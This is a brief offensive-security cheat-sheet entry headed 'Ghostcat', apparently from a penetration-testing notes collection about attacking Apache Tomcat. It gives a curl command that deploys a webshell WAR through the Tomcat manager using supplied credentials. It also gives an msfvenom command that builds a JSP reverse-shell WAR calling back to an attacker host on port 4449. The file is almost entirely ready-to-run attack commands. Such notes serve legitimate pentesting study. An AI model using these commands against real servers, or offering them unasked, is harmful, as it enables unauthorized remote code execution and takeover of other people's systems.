killchain-compendium/exploit/java/ghostcat.md

564 B

Ghostcat

curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
  • Visit the webshell at $TARGET_IP:8080/shello/
  • Alternatively use a war reverse shell via
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war